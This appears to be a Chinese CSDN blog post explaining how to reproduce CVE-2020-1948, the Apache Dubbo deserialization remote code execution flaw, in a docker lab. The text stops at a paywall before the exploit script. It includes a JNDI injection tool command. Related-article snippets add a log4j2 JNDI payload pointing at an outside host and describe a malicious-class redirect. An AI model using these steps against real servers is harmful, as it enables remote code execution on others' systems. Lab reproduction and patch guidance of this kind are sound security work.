Apache Dubbo Provider 远程代码执行漏洞 (CVE-2020-1948)附docker环境

最新推荐文章于 2024-06-18 22:22:54 发布
最新推荐文章于 2024-06-18 22:22:54 发布
阅读量774 收藏 1
点赞数
文章标签: 经验分享 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrooge51/article/details/107176807
版权
本文详细介绍了Apache Dubbo Provider的CVE-2020-1948远程代码执行漏洞,包括漏洞原理、受影响版本和复现步骤。通过docker搭建环境,使用JNDI注入工具,并通过python脚本来执行恶意代码。修复方案包括升级到2.7.7以上版本或更改协议和反序列化方式。
摘要由CSDN通过智能技术生成

漏洞原理

Dubbo协议默认采用Hessian作为序列化反序列化方式,而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dubbo服务端加载远程恶意类从而执行恶意代码.

影响版本

Apache Dubbo 2.7.0 ~ 2.7.6
Apache Dubbo 2.6.0 ~ 2.6.7
Apache Dubbo 2.5.x 所有版本 (官方不再提供支持)

复现流程

漏洞环境(含利用脚本)

1. 利用docker搭建漏洞环境

//本地创建环境:
cd docker/
docker build -t dubbo:test1 .
docker run -d -p 12345:12345 dubbo:test1
docker logs 容器ID //查看容器是否成功运行
netstat -lntp//查看本地是否有12345端口服务,有代表服务成功开启

2. 开启JNDI 利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “touch /tmp/121” -A 192.168.1.1

-C 要执行的命令
-A 监听IP

执行之后会开启rmi或ldap服务、webserver log,

3. CVE-2020-1948.py

修改 DubboClient ip 为 dubbo provider 服务地址
修改

最低0.47元/天 解锁文章
scrooge51
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 686
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
CVE-2020-1948补丁绕过 Apache Dubbo 远程代码执行漏洞
AmyBaby00的博客
06-30 1075
漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 Apache Dubbo Provider 存在 反序列化漏洞,攻击者可以通过RPC请求发送无法识别的服务名称或方法名称以及一些恶意参
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
Apache log4j2漏洞复现
最新发布
2401_83659708的博客
06-18 323
目录步骤一启动环境步骤二检查是否存在log4j2漏洞网站:CEYE - Monitor service for security testing 将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站步骤三安装jndi注入工具,并且反弹shell1.在kali安装下列这个文件夹git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用2.进入目录,使用mvn工具打包2.1未进行安装的话,安装mvnapt instal
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
爱国小白帽
06-23 3135
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1394
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞CVE-2020-1948)通告
爱国小白帽
06-23 817
漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞CVE-2020-1948)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0038 2020-06-23 TA****G: Apache Dubbo、反序列化、CVE-2020-1948 漏洞危害: 高,攻击者利用此漏洞,可实现远程代码执行。 应急等级: 蓝色 版本: 1.0 1 漏洞概述 6月23日,Apache
[Timeline Sec] - CVE-2020-1948Dubbo Provider默认反序列化复现1
08-03
然而,2020年,腾讯安全团队发现了一个重要的安全漏洞,即CVE-2020-1948,这是一个Dubbo Provider默认反序列化远程代码执行漏洞。攻击者可以构造恶意请求,导致任意代码执行。 **漏洞细节** 在受影响的Dubbo版本...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
总结起来,CVE-2019-17564是一个严重的Apache Dubbo安全漏洞,它涉及Http反序列化,可能导致远程代码执行。了解漏洞的工作原理,正确配置和管理Dubbo服务,以及保持软件更新,都是防范此类威胁的重要步骤。在区块链...
apache-dubbo-admin-0.4.0-bin-release 压缩包下载
05-23
这个“apache-dubbo-admin-0.4.0-bin-release”压缩包包含了用于管理和监控Dubbo服务的管理工具,专为Windows用户设计。 在了解这个压缩包之前,我们先来看看Apache Dubbo的核心特性: 1. **服务治理**:Dubbo提供...
Apache Dubbo CVE-2020-1948 反序列化漏洞利用
weixin_46137328的博客
07-08 2049
0x00 漏洞背景2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为CVE-2020-1948漏洞等级:高危。...
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
锋刃科技的博客
12-27 1292
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
Apache Dubbo CVE-2020-1948 测试环境复现
aweiweiweiei1的博客
01-26 254
https://github.com/txrw/Dubbo-CVE-2020-1948
Apache Dubbo 反序列化-(CVE-2020-1948)
tamchikit的博客
01-04 392
Apache Dubbo 反序列化-(CVE-2020-1948)
Apache Dubbo Provider默认反序列化RCE(CVE-2020-1948)复现
锋刃科技的博客
03-05 1223
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 影响版本 Dubbo 2.7.0 - 2.7.6 Dubbo 2.6.0 - 2.6.7 Dubbo 2.5.x 环境搭建 docker 拉取环境 docker pull dsolab/dubbo:cve-2020-1948 docker启动 docker run -p 1...
[CVE-2020-1948]Apache Dubbo Provider默认反序列化RCE
公众号shadow sock7
06-24 5188
git clone https://github.com/apache/dubbo-spring-boot-project cd dubbo-spring-boot-project git checkout 2.7.1 -b b2.7.1 # 将整个项目dubbo-spring-boot-project导入IDEA 在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml 引入以下依赖: <d
【补丁绕过】CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞通告更新
爱国小白帽
06-30 934
【补丁绕过】CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞通告更新 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接
[CVE-2020-1948] Apache Dubbo 反序列化漏洞分析
阿道夫的博客
12-17 536
Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
Dubbo 2.7.6 反序列化漏洞CVE-2020-1948远程代码执行风险
Dubbo CVE-2020-1948 是一个关于Apache Dubbo服务框架的安全漏洞,它允许远程代码执行(RCE)。Dubbo是由阿里巴巴开发的一个广泛使用的高性能分布式服务框架,它简化了服务的生产和消费过程,特别适合微服务架构。此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值